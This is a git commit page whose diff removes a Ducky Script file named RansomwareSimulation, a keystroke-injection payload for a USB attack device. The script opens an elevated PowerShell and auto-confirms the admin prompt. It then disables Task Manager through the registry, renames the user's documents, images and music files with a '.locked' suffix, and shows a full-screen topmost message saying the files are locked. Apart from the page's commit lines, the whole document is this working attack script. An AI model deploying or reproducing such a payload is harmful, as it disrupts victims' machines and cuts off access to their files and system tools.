Rename RansomwareSimulation to 1. RansomwareSimulation
This commit is contained in:
Mark
@@ -1,29 +0,0 @@
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 100
|
||||
STRING powershell -Command "Start-Process powershell -Verb runAs"
|
||||
ENTER
|
||||
DELAY 500
|
||||
ALT y
|
||||
DELAY 500
|
||||
|
||||
REM Check for admin privileges and proceed with Task Manager disable attempt
|
||||
STRING if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { exit }
|
||||
ENTER
|
||||
STRING $regPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; $regName = 'DisableTaskMgr'; Set-ItemProperty -Path $regPath -Name $regName -Value 1
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Rename files in specified locations
|
||||
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File | Where-Object { $_.Extension -match '\.doc$|\.xls$|\.jpg$|\.png$|\.mp3$' }; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
|
||||
IF ($errorOccurred) { exit }
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM Display ransomware message
|
||||
STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files are locked and inaccessible. Contact Shark or your IT support team.'; $Window.ShowDialog()
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
STRING exit
|
||||
ENTER
|
||||
Reference in New Issue
Block a user